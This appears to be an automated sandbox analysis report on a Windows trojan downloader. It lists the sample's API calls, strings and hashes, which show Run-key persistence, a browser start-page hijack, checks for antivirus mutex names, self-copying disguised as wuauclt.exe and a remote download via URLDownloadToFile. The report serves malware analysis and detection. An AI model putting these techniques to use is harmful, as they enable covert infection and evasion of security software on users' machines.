                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b5cc6f4e8601f6bcbfd67292a8b471391b2f86e951d761d7ea2a1644390cc92a
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b5cc6f4e8601f6bcbfd67292a8b471391b2f86e951d761d7ea2a1644390cc92a
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 00408BD4 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 133filewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
                                                                            • PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
                                                                            • SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
                                                                            • DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
                                                                            • String ID: bbyb$open$wuauclt.exe
                                                                            • API String ID: 2051752798-429206649
                                                                            • Opcode ID: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
                                                                            • Opcode Fuzzy Hash: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D
                                                                            Function 004081E8 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 128filesleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
                                                                            • String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
                                                                            • API String ID: 1217617683-1617324073
                                                                            • Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
                                                                            • Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D
                                                                            Function 007418DB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107registryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007418F7
                                                                            • RegOpenKeyExA.KERNEL32(80000000,Applications\iexplore.exe\shell\open\command,00000000,00000001,?), ref: 00741911
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0074192B
                                                                            • RegCloseKey.KERNEL32(?), ref: 00741985
                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00741996
                                                                            • ReadFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 007419B6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007419C0
                                                                            Strings
                                                                            • C:\Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 00741968
                                                                            • Applications\iexplore.exe\shell\open\command, xrefs: 0074190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFile$CreateDirectoryHandleOpenQueryReadValueWindows
                                                                            • String ID: Applications\iexplore.exe\shell\open\command$C:\Program Files\Internet Explorer\IEXPLORE.EXE
                                                                            • API String ID: 418526577-3772566379
                                                                            • Opcode ID: 6382d5f0b092d97e32057f3048904276d8e99775e3dbb19f3df7423156e039d2
                                                                            • Instruction ID: edf26cb5b2fdfd7aca4b543a6d92762bffc3fc4f7e0eafbba8dde198d743a535
                                                                            • Opcode Fuzzy Hash: 6382d5f0b092d97e32057f3048904276d8e99775e3dbb19f3df7423156e039d2
                                                                            • Instruction Fuzzy Hash: EB315CB190029CBFEB11AF94DC95AEE7BBCEB05794F9040A6F504A6190D7385EC48B64
                                                                            Function 0040288C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 568 40288c-4028a0 569 4028a2-4028a3 568->569 570 4028ad-4028c3 568->570 571 4028c5-4028d4 569->571 572 4028a5-4028a6 569->572 573 4028ec-4028fe 570->573 576 4028e5 571->576 574 4028d6-4028e0 572->574 575 4028a8 572->575 577 402904-40291c CreateFileA 573->577 578 4029b6-4029d3 573->578 574->576 579 402a14-402a15 575->579 576->573 582 402922-40292a 577->582 583 402a2a-402a35 GetLastError 577->583 580 4029d5-4029d7 578->580 581 4029d9-4029df 578->581 584 4029e7-4029ef GetStdHandle 580->584 585 4029e1-4029e3 581->585 586 4029e5 581->586 587 402930-40293e GetFileSize 582->587 588 4029f3-4029f9 582->588 583->579 584->583 592 4029f1 584->592 585->584 586->584 587->583 591 402944-402949 587->591 589 402a12 588->589 590 4029fb-402a04 GetFileType 588->590 589->579 593 402a16-402a28 CloseHandle 590->593 594 402a06-402a09 590->594 595 40294b 591->595 596 40294d-40295a SetFilePointer 591->596 592->588 593->579 594->589 598 402a0b 594->598 595->596 596->583 597 402960-40297c ReadFile 596->597 597->583 599 402982 597->599 598->589 600 402984-402986 599->600 600->588 601 402988-402990 600->601 602 402992-402993 601->602 603 402995-4029a4 SetFilePointer 601->603 602->600 603->583 604 4029aa-4029b2 SetEndOfFile 603->604 604->583 605 4029b4 604->605 605->588
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 004029E7
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 004029FD
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402A30
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
                                                                            • Opcode Fuzzy Hash: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
                                                                            • Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D
                                                                            Function 00406728 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
                                                                              • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShellSystem$DirectoryTime
                                                                            • String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
                                                                            • API String ID: 3953870399-2285911871
                                                                            • Opcode ID: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
                                                                            • Opcode Fuzzy Hash: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
                                                                            • Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9
                                                                            Function 00403854 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 648 403854-40385c 649 4038b5-4038bc 648->649 650 40385e-403867 648->650 653 4038d1-4038d2 649->653 654 4038be-4038cc MessageBoxA 649->654 651 403869-403870 650->651 652 40387d-4038b4 GetStdHandle WriteFile GetStdHandle WriteFile 650->652 651->652 655 403872 651->655 654->653 655->652
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
                                                                            • GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922), ref: 004038A8
                                                                            • WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922), ref: 004038AE
                                                                            • MessageBoxA.USER32(00000000,Runtime error 204 at 004024A4,Error,00000000), ref: 004038CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error 204 at 004024A4
                                                                            • API String ID: 1570097196-1210366263
                                                                            • Opcode ID: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
                                                                            • Instruction ID: 73fe0ec3fb90fb3f474716323d8876418e50ff0bdbf46fc0c8a6d106d48d8078
                                                                            • Opcode Fuzzy Hash: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
                                                                            • Instruction Fuzzy Hash: 89F09662A8434478E73077615D06F56369C5744F16F20C6BFB260745F2C6BC89C4831E
                                                                            Function 00741A60 Relevance: 12.1, APIs: 8, Instructions: 135memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00741AA2
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00741AAC
                                                                            • K32EnumProcesses.KERNEL32(00000000,00001000,00000000), ref: 00741ACF
                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00741B23
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00741B90
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00741B98
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00741BA2
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00741BB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Free$Alloc$ChangeCloseEnumFindNotificationProcesses
                                                                            • String ID:
                                                                            • API String ID: 3700081247-0
                                                                            • Opcode ID: 7c549f0e201ddbfeb435f4ae4af981e028cfcc3721ad8a18c754fdd26cb48ad4
                                                                            • Instruction ID: 8b5f1f6882e4fdfbda3c75d7ebf349de15f0e7b955e36f1e281c4415aa360201
                                                                            • Opcode Fuzzy Hash: 7c549f0e201ddbfeb435f4ae4af981e028cfcc3721ad8a18c754fdd26cb48ad4
                                                                            • Instruction Fuzzy Hash: 00412075A00208AFDB20EF95CC84FEEBBB9EF49350F518065F915A7250D7749A81CB64
                                                                            Function 00407DC8 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
                                                                            • Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9
                                                                            Function 00407DD0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 63sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
                                                                            • Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD
                                                                            Function 0040187C Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 743 40187c-401887 744 401959-40195b 743->744 745 40188d-4018a2 743->745 746 4018a4-4018a9 RtlEnterCriticalSection 745->746 747 4018ae-4018cd LocalFree 745->747 746->747 748 4018e1-4018e7 747->748 749 4018e9-40190e call 40117c * 3 748->749 750 4018cf-4018df VirtualFree 748->750 757 401910-401925 LocalFree 749->757 758 401927-40193b 749->758 750->748 757->757 757->758 760 401947-401951 RtlDeleteCriticalSection 758->760 761 40193d-401942 RtlLeaveCriticalSection 758->761 761->760
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
                                                                            • LocalFree.KERNEL32(007F2238,00000000,00401952), ref: 004018BB
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,007F2238,00000000,00401952), ref: 004018DA
                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,007F2238,00000000,00401952), ref: 00401919
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
